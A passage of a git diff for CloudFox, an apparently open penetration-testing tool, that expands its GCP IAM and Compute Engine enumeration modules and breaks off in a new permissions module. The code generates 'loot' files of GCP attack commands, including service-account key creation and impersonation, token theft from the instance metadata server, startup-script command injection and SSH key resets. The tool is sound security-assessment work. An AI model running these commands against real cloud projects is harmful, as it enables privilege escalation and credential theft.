gcloud commands for enumeration + if principal.Type == "ServiceAccount" { + saEmail := strings.TrimPrefix(principal.Name, "serviceAccount:") + m.LootMap["iam-gcloud-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "gcloud iam service-accounts describe %s --project=%s\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n\n", + saEmail, + saEmail, projectID, + saEmail, projectID, + saEmail, projectID, + ) + + // Service account exploitation commands + m.LootMap["iam-service-accounts"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Create a key for this service account:\n"+ + "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ + "# Generate access token:\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n"+ + "# Generate ID token:\n"+ + "gcloud auth print-identity-token --impersonate-service-account=%s\n\n", + saEmail, + saEmail, projectID, + saEmail, + saEmail, + ) + } + + // High privilege principals + if hasHighPrivilege { + m.LootMap["iam-high-privilege"].Contents += fmt.Sprintf( + "# Principal: %s (Type: %s)\n"+ + "# High-Privilege Roles: %s\n"+ + "# Resource: %s/%s\n", + principal.Name, principal.Type, + strings.Join(highPrivRoles, ", "), + principal.ResourceType, principal.ResourceID, + ) + if principal.HasCustomRoles { + m.LootMap["iam-high-privilege"].Contents += fmt.Sprintf( + "# Custom Roles: %s\n", strings.Join(principal.CustomRoles, ", ")) + } + m.LootMap["iam-high-privilege"].Contents += "\n" + + // Privilege escalation paths + if principal.Type == "ServiceAccount" { + saEmail := strings.TrimPrefix(principal.Name, "serviceAccount:") + m.LootMap["iam-privilege-escalation"].Contents += fmt.Sprintf( + "# Service Account: %s has high privileges\n"+ + "# Roles: %s\n"+ + "# Potential privilege escalation via service account key creation:\n"+ + "gcloud iam service-accounts keys create ./key.json --iam-account=%s\n"+ + "# Then authenticate:\n"+ + "gcloud auth activate-service-account %s --key-file=./key.json\n\n", + saEmail, + strings.Join(highPrivRoles, ", "), + saEmail, + saEmail, + ) + } + } +} + +// addServiceAccountToLoot adds detailed service account info to loot +func (m *IAMModule) addServiceAccountToLoot(sa IAMService.ServiceAccountInfo, projectID string) { + // Service accounts with user-managed keys + if sa.HasKeys { + m.LootMap["iam-service-account-keys"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Project: %s\n"+ + "# User-Managed Keys: %d\n"+ + "# Disabled: %v\n"+ + "# List keys:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n", + sa.Email, + projectID, + sa.KeyCount, + sa.Disabled, + sa.Email, projectID, + ) + } +} + +// addCustomRoleToLoot adds custom role info to loot +func (m *IAMModule) addCustomRoleToLoot(role IAMService.CustomRole) { + deletedStr := "" + if role.Deleted { + deletedStr = " [DELETED]" + } + m.LootMap["iam-custom-roles"].Contents += fmt.Sprintf( + "# Role: %s%s\n"+ + "# Title: %s\n"+ + "# Stage: %s\n"+ + "# Permissions: %d\n"+ + "# Description: %s\n"+ + "# View role details:\n"+ + "gcloud iam roles describe %s --project=%s\n\n", + role.Name, deletedStr, + role.Title, + role.Stage, + role.PermissionCount, + role.Description, + extractRoleName(role.Name), role.ProjectID, + ) +} + +// extractRoleName extracts the role name from full path +func extractRoleName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// truncateString truncates a string to maxLen characters +func truncateString(s string, maxLen int) string { + if len(s) <= maxLen { + return s } + return s[:maxLen-3] + "..." +} - var body [][]string +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main principals table with security columns + principalHeader := []string{ + "Principal", + "Type", + "Role", + "High Priv", + "Custom Role", + "Inherited", + "Condition", + "Source", + "Project", + } - for _, principal := range g.Data { + var principalBody [][]string + publicAccessFound := false + conditionsFound := false + for _, principal := range m.Principals { for _, binding := range principal.PolicyBindings { - body = append(body, []string{ - principal.Name, + isHighPriv := "" + if highPrivilegeRoles[binding.Role] { + isHighPriv = "YES" + } + + isCustom := "" + if strings.HasPrefix(binding.Role, "projects/") || strings.HasPrefix(binding.Role, "organizations/") { + isCustom = "✓" + } + + inherited := "" + source := binding.ResourceType + if binding.IsInherited { + inherited = "✓" + source = binding.InheritedFrom + } + + // Check for conditions (conditional access) + condition := "" + if binding.HasCondition { + conditionsFound = true + if binding.ConditionInfo != nil && binding.ConditionInfo.Title != "" { + condition = binding.ConditionInfo.Title + } else { + condition = "✓" + } + } + + // Check for public access + if principal.Type == "PUBLIC" || principal.Type == "ALL_AUTHENTICATED" { + publicAccessFound = true + } + + principalBody = append(principalBody, []string{ + principal.Email, principal.Type, binding.Role, - principal.ResourceType, + isHighPriv, + isCustom, + inherited, + condition, + source, + binding.ResourceID, + }) + } + } + + // Service accounts table + saHeader := []string{ + "Email", + "Display Name", + "Disabled", + "Has Keys", + "Key Count", + "Project", + } + + var saBody [][]string + saWithKeys := 0 + for _, sa := range m.ServiceAccounts { + disabled := "" + if sa.Disabled { + disabled = "✓" + } + hasKeys := "" + if sa.HasKeys { + hasKeys = "YES" + saWithKeys++ + } + + saBody = append(saBody, []string{ + sa.Email, + sa.DisplayName, + disabled, + hasKeys, + fmt.Sprintf("%d", sa.KeyCount), + sa.ProjectID, + }) + } + + // Custom roles table + customRoleHeader := []string{ + "Role Name", + "Title", + "Stage", + "Permissions", + "Deleted", + "Project", + } + + var customRoleBody [][]string + for _, role := range m.CustomRoles { + deleted := "" + if role.Deleted { + deleted = "✓" + } + + customRoleBody = append(customRoleBody, []string{ + extractRoleName(role.Name), + role.Title, + role.Stage, + fmt.Sprintf("%d", role.PermissionCount), + deleted, + role.ProjectID, + }) + } + + // Groups table + groupHeader := []string{ + "Group Email", + "Role Count", + "High Privilege", + "Project", + } + + var groupBody [][]string + for _, group := range m.Groups { + hasHighPriv := "" + for _, role := range group.Roles { + if highPrivilegeRoles[role] { + hasHighPriv = "YES" + break + } + } + + groupBody = append(groupBody, []string{ + group.Email, + fmt.Sprintf("%d", len(group.Roles)), + hasHighPriv, + group.ProjectID, + }) + } + + // High privilege principals table + highPrivHeader := []string{ + "Principal", + "Type", + "High Priv Roles", + "Custom Roles", + "Project", + } + + var highPrivBody [][]string + highPrivSet := make(map[string]bool) + for _, principal := range m.Principals { + var highPrivRoles []string + for _, binding := range principal.PolicyBindings { + if highPrivilegeRoles[binding.Role] { + highPrivRoles = append(highPrivRoles, binding.Role) + } + } + if len(highPrivRoles) > 0 && !highPrivSet[principal.Name] { + highPrivSet[principal.Name] = true + customRolesStr := "" + if principal.HasCustomRoles { + customRolesStr = strings.Join(principal.CustomRoles, ", ") + } + highPrivBody = append(highPrivBody, []string{ + principal.Email, + principal.Type, + strings.Join(highPrivRoles, ", "), + customRolesStr, principal.ResourceID, }) } } - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_IAM_MODULE_NAME, + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } - tableFiles = append(tableFiles, tableFile) - return tableFiles -} + // Build tables + tables := []internal.TableFile{ + { + Name: "iam-principals", + Header: principalHeader, + Body: principalBody, + }, + } -// LootFiles can be implemented if needed -func (g GCPIAMResults) LootFiles() []internal.LootFile { - return []internal.LootFile{} -} + // Add service accounts table if there are any + if len(saBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "iam-service-accounts", + Header: saHeader, + Body: saBody, + }) + } -// Houses high-level logic that retrieves IAM information and writes to output -func runGCPIAMCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs and resource type from parent (gcp command) ctx - var projectIDs []string - var resourceType string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_IAM_MODULE_NAME) - return + // Add custom roles table if there are any + if len(customRoleBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "iam-custom-roles", + Header: customRoleHeader, + Body: customRoleBody, + }) } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + // Add groups table if there are any + if len(groupBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "iam-groups", + Header: groupHeader, + Body: groupBody, + }) } - // TODO fix once folders or organizations are supported as input for project root - resourceType = "project" + // Add high privilege principals table if there are any + if len(highPrivBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "iam-high-privilege", + Header: highPrivHeader, + Body: highPrivBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d principal(s) with high-privilege roles!", len(highPrivBody)), globals.GCP_IAM_MODULE_NAME) + } - // Initialize IAMService and fetch principals with roles for the given projectIDs and resource type - iamService := IAMService.New() - var results []IAMService.PrincipalWithRoles - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving IAM information for resource: %s of type %s", projectID, resourceType), globals.GCP_IAM_MODULE_NAME) - principals, err := iamService.PrincipalsWithRoles(projectID, resourceType) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_IAM_MODULE_NAME) - return - } - results = append(results, principals...) - logger.InfoM(fmt.Sprintf("Done retrieving IAM information for resource: %s of type %s", projectID, resourceType), globals.GCP_IAM_MODULE_NAME) - cloudfoxOutput := GCPIAMResults{Data: results} - - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_IAM_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_IAM_MODULE_NAME) - return - } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_IAM_MODULE_NAME) + // Conditional bindings table + conditionsHeader := []string{ + "Principal", + "Type", + "Role", + "Condition Title", + "Condition Expression", + "Project", + } + + var conditionsBody [][]string + for _, principal := range m.Principals { + for _, binding := range principal.PolicyBindings { + if binding.HasCondition && binding.ConditionInfo != nil { + conditionsBody = append(conditionsBody, []string{ + principal.Email, + principal.Type, + binding.Role, + binding.ConditionInfo.Title, + truncateString(binding.ConditionInfo.Expression, 80), + binding.ResourceID, + }) + } + } + } + + // Add conditional bindings table if there are any + if len(conditionsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "iam-conditions", + Header: conditionsHeader, + Body: conditionsBody, + }) + } + + // Log warnings for security findings + if publicAccessFound { + logger.InfoM("[FINDING] Public access (allUsers/allAuthenticatedUsers) detected in IAM bindings!", globals.GCP_IAM_MODULE_NAME) + } + if saWithKeys > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d service account(s) with user-managed keys!", saWithKeys), globals.GCP_IAM_MODULE_NAME) + } + if conditionsFound { + logger.InfoM(fmt.Sprintf("[INFO] Found %d conditional IAM binding(s)", len(conditionsBody)), globals.GCP_IAM_MODULE_NAME) + } + + output := IAMOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 79334951..dd546b96 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -1,126 +1,509 @@ package commands import ( + "context" "fmt" + "strings" + "sync" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) var GCPInstancesCommand = &cobra.Command{ - Use: globals.GCP_INSTANCES_MODULE_NAME, // This should be defined in the globals package - Aliases: []string{}, - Short: "Display GCP Compute Engine instances information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available Compute Engine instances information: -cloudfox gcp instances`, + Use: globals.GCP_INSTANCES_MODULE_NAME, + Aliases: []string{"vms", "compute"}, + Short: "Enumerate GCP Compute Engine instances with security configuration", + Long: `Enumerate GCP Compute Engine instances across projects with security-relevant details. + +Features: +- Lists all instances with network and security configuration +- Shows attached service accounts and their scopes +- Identifies instances with default service accounts or broad scopes +- Shows Shielded VM, Secure Boot, and Confidential VM status +- Shows OS Login and serial port configuration +- Shows disk encryption type (Google-managed vs CMEK/CSEK) +- Generates gcloud commands for instance access +- Generates exploitation commands (SSH, serial console, metadata) + +Security Columns: +- ExternalIP: Instances with external IPs are internet-accessible +- DefaultSA: Uses default compute service account (security risk) +- BroadScopes: Has cloud-platform or other broad OAuth scopes +- CanIPForward: Can forward packets (potential for lateral movement) +- OSLogin: OS Login enabled (recommended for access control) +- SerialPort: Serial port access enabled (security risk if exposed) +- ShieldedVM: Shielded VM features enabled +- SecureBoot: Secure Boot enabled (prevents rootkits) +- Encryption: Boot disk encryption type`, Run: runGCPInstancesCommand, } -// GCPInstancesResults implements internal.OutputInterface for Compute Engine instances -type GCPInstancesResults struct { - Data []ComputeEngineService.ComputeEngineInfo +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type InstancesModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Instances []ComputeEngineService.ComputeEngineInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type InstancesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o InstancesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o InstancesOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPInstancesCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_INSTANCES_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &InstancesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []ComputeEngineService.ComputeEngineInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *InstancesModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_INSTANCES_MODULE_NAME, m.processProject) + + // Check results + if len(m.Instances) == 0 { + logger.InfoM("No instances found", globals.GCP_INSTANCES_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(m.Instances)), globals.GCP_INSTANCES_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *InstancesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating instances in project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) + } + + // Create service and fetch instances + ces := ComputeEngineService.New() + instances, err := ces.Instances(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating instances in project %s: %v", projectID, err), globals.GCP_INSTANCES_MODULE_NAME) + } + return + } + + // Thread-safe append + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + + // Generate loot for each instance + for _, instance := range instances { + m.addInstanceToLoot(instance) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) in project %s", len(instances), projectID), globals.GCP_INSTANCES_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *InstancesModule) initializeLootFiles() { + m.LootMap["instances-gcloud-commands"] = &internal.LootFile{ + Name: "instances-gcloud-commands", + Contents: "# GCP Compute Engine Instance Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["instances-ssh-commands"] = &internal.LootFile{ + Name: "instances-ssh-commands", + Contents: "# GCP Instance SSH Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["instances-exploitation"] = &internal.LootFile{ + Name: "instances-exploitation", + Contents: "# GCP Instance Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["instances-metadata"] = &internal.LootFile{ + Name: "instances-metadata", + Contents: "# GCP Instance Metadata Access Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.ComputeEngineInfo) { + // Build service account string + var saEmails []string + for _, sa := range instance.ServiceAccounts { + saEmails = append(saEmails, sa.Email) + } + saString := strings.Join(saEmails, ", ") + + // Build security flags string + var securityFlags []string + if instance.HasDefaultSA { + securityFlags = append(securityFlags, "DEFAULT_SA") + } + if instance.HasCloudScopes { + securityFlags = append(securityFlags, "BROAD_SCOPES") + } + if instance.ExternalIP != "" { + securityFlags = append(securityFlags, "EXTERNAL_IP") + } + if instance.SerialPortEnabled { + securityFlags = append(securityFlags, "SERIAL_PORT") + } + if !instance.OSLoginEnabled { + securityFlags = append(securityFlags, "NO_OSLOGIN") + } + securityString := strings.Join(securityFlags, ", ") + if securityString == "" { + securityString = "None" + } + + // gcloud commands for enumeration + m.LootMap["instances-gcloud-commands"].Contents += fmt.Sprintf( + "# Instance: %s (Project: %s, Zone: %s)\n"+ + "# Service Accounts: %s\n"+ + "# Security Flags: %s\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "gcloud compute instances get-serial-port-output %s --zone=%s --project=%s\n"+ + "gcloud compute instances get-iam-policy %s --zone=%s --project=%s\n\n", + instance.Name, instance.ProjectID, instance.Zone, saString, securityString, + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + // SSH commands (if external IP exists) + if instance.ExternalIP != "" { + m.LootMap["instances-ssh-commands"].Contents += fmt.Sprintf( + "# Instance: %s (External IP: %s)\n"+ + "# OS Login: %v, Serial Port: %v\n"+ + "gcloud compute ssh %s --zone=%s --project=%s\n"+ + "# Direct SSH (if OS Login disabled):\n"+ + "ssh -i @%s\n\n", + instance.Name, instance.ExternalIP, instance.OSLoginEnabled, instance.SerialPortEnabled, + instance.Name, instance.Zone, instance.ProjectID, + instance.ExternalIP, + ) + } else { + m.LootMap["instances-ssh-commands"].Contents += fmt.Sprintf( + "# Instance: %s (Internal IP: %s, No external IP)\n"+ + "# OS Login: %v\n"+ + "# Use IAP tunnel:\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap\n\n", + instance.Name, instance.InternalIP, instance.OSLoginEnabled, + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // Exploitation commands + m.LootMap["instances-exploitation"].Contents += fmt.Sprintf( + "# Instance: %s (State: %s)\n"+ + "# Service Account: %s\n"+ + "# Default SA: %v, Broad Scopes: %v\n"+ + "# Get instance metadata (from inside the instance):\n"+ + "curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/?recursive=true\n"+ + "# Get service account token:\n"+ + "curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\n"+ + "# Run command via startup script:\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+ + "# Reset SSH keys:\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata-from-file=ssh-keys=\n\n", + instance.Name, instance.State, saString, instance.HasDefaultSA, instance.HasCloudScopes, + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + // Metadata access commands + m.LootMap["instances-metadata"].Contents += fmt.Sprintf( + "# Instance: %s\n"+ + "# Has Startup Script: %v, Has SSH Keys: %v\n"+ + "# Block Project SSH Keys: %v\n"+ + "# Get instance metadata:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s --format='yaml(metadata)'\n"+ + "# Get custom metadata (startup scripts, SSH keys, etc):\n"+ + "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", + instance.Name, instance.HasStartupScript, instance.HasSSHKeys, instance.BlockProjectSSHKeys, + instance.Name, instance.Zone, instance.ProjectID, + instance.ProjectID, + ) } -func (g GCPInstancesResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Helper Functions +// ------------------------------ +func instanceBoolToCheck(b bool) string { + if b { + return "✓" + } + return "-" +} +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main table with security-relevant columns header := []string{ + "Project ID", "Name", - "ID", - "State", - "ExternalIP", - "InternalIP", - "ServiceAccount", // Adding ServiceAccount to the header "Zone", - "ProjectID", + "State", + "External IP", + "Internal IP", + "Service Account", + "DefaultSA", + "BroadScopes", + "OSLogin", + "SerialPort", + "ShieldedVM", + "SecureBoot", + "Encryption", } var body [][]string - for _, instance := range g.Data { - // Initialize an empty string to aggregate service account emails - var serviceAccountEmails string - for _, serviceAccount := range instance.ServiceAccounts { - // Assuming each instance can have multiple service accounts, concatenate their emails - if serviceAccountEmails != "" { - serviceAccountEmails += "; " // Use semicolon as a delimiter for multiple emails + for _, instance := range m.Instances { + // Get first service account email (most instances have just one) + saEmail := "-" + if len(instance.ServiceAccounts) > 0 { + saEmail = instance.ServiceAccounts[0].Email + // Shorten default SA for display + if strings.Contains(saEmail, "-compute@developer.gserviceaccount.com") { + saEmail = "default-compute-sa" } - serviceAccountEmails += serviceAccount.Email + } + + // External IP display + externalIP := instance.ExternalIP + if externalIP == "" { + externalIP = "-" } body = append(body, []string{ + instance.ProjectID, instance.Name, - instance.ID, + instance.Zone, instance.State, - instance.ExternalIP, + externalIP, instance.InternalIP, - serviceAccountEmails, // Add the aggregated service account emails to the output - instance.Zone, - instance.ProjectID, + saEmail, + instanceBoolToCheck(instance.HasDefaultSA), + instanceBoolToCheck(instance.HasCloudScopes), + instanceBoolToCheck(instance.OSLoginEnabled), + instanceBoolToCheck(instance.SerialPortEnabled), + instanceBoolToCheck(instance.ShieldedVM), + instanceBoolToCheck(instance.SecureBoot), + instance.BootDiskEncryption, }) } - tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_INSTANCES_MODULE_NAME, - Header: header, - Body: body, - }) + // Detailed service account table - shows full SA info with scopes + saHeader := []string{ + "Instance", + "Project ID", + "Zone", + "Service Account", + "Default SA", + "Scopes", + } - return tableFiles -} + var saBody [][]string + for _, instance := range m.Instances { + for _, sa := range instance.ServiceAccounts { + isDefault := "-" + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { + isDefault = "✓" + } -func (g GCPInstancesResults) LootFiles() []internal.LootFile { - // Define any loot files if applicable - return []internal.LootFile{} -} + // Format scopes (shorten URLs) + scopes := ComputeEngineService.FormatScopes(sa.Scopes) -func runGCPInstancesCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_INSTANCES_MODULE_NAME) - return + saBody = append(saBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + sa.Email, + isDefault, + scopes, + }) + } } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + // Security findings table - highlight risky configurations + findingsHeader := []string{ + "Instance", + "Project ID", + "Zone", + "Finding", + "Severity", + "Details", } - ces := ComputeEngineService.New() - var results []ComputeEngineService.ComputeEngineInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all instances from project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) - result, err := ces.Instances(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_INSTANCES_MODULE_NAME) - return + var findingsBody [][]string + for _, instance := range m.Instances { + // Check for security issues + if instance.HasDefaultSA { + findingsBody = append(findingsBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + "Default Service Account", + "MEDIUM", + "Using default compute service account - consider using a custom SA", + }) + } + if instance.HasCloudScopes { + findingsBody = append(findingsBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + "Broad OAuth Scopes", + "HIGH", + "Has cloud-platform or other broad scopes - potential for privilege escalation", + }) + } + if instance.ExternalIP != "" && !instance.OSLoginEnabled { + findingsBody = append(findingsBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + "External IP without OS Login", + "MEDIUM", + fmt.Sprintf("External IP %s exposed without OS Login enabled", instance.ExternalIP), + }) } - results = append(results, result...) - logger.InfoM(fmt.Sprintf("Done retrieving all instances from project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) - cloudfoxOutput := GCPInstancesResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_INSTANCES_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_INSTANCES_MODULE_NAME) - return + if instance.SerialPortEnabled { + findingsBody = append(findingsBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + "Serial Port Enabled", + "LOW", + "Serial port access enabled - potential for console access", + }) + } + if instance.CanIPForward { + findingsBody = append(findingsBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + "IP Forwarding Enabled", + "INFO", + "Can forward packets - may be intentional for NAT/routing", + }) + } + if !instance.ShieldedVM { + findingsBody = append(findingsBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + "Shielded VM Disabled", + "LOW", + "Shielded VM not enabled - consider enabling for security", + }) + } + if instance.HasStartupScript && instance.HasDefaultSA && instance.HasCloudScopes { + findingsBody = append(findingsBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + "Startup Script with Broad Access", + "HIGH", + "Has startup script with default SA and broad scopes - potential for code execution", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM("Done writing output", globals.GCP_INSTANCES_MODULE_NAME) + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_INSTANCES_MODULE_NAME, + Header: header, + Body: body, + }, + } + + // Add service accounts table if there are any + if len(saBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-service-accounts", + Header: saHeader, + Body: saBody, + }) + } + + // Add findings table if there are any + if len(findingsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-findings", + Header: findingsHeader, + Body: findingsBody, + }) + } + + output := InstancesOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_INSTANCES_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go new file mode 100644 index 00000000..2bb4fb0b --- /dev/null +++ b/gcp/commands/permissions.go @@ -0,0 +1,642 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPermissionsCommand = &cobra.Command{ + Use: globals.GCP_PERMISSIONS_MODULE_NAME, + Aliases: []string{"perms", "privs"}, + Short: "Enumerate all permissions for each IAM entity with detailed source information", + Long: `Enumerate all permissions for each IAM entity (user, service account, group, etc.) with detailed source information. + +Features: +- Lists every permission for each entity line by line +- Shows the role that granted each permission +- Identifies if permissions are inherited from folders/organization +- Shows conditional access restrictions on permissions +- Distinguishes between predefined, custom, and basic roles +- Summarizes total and unique permission counts per entity +- Identifies high-privilege permissions (iam.*, resourcemanager.*, etc.) +- 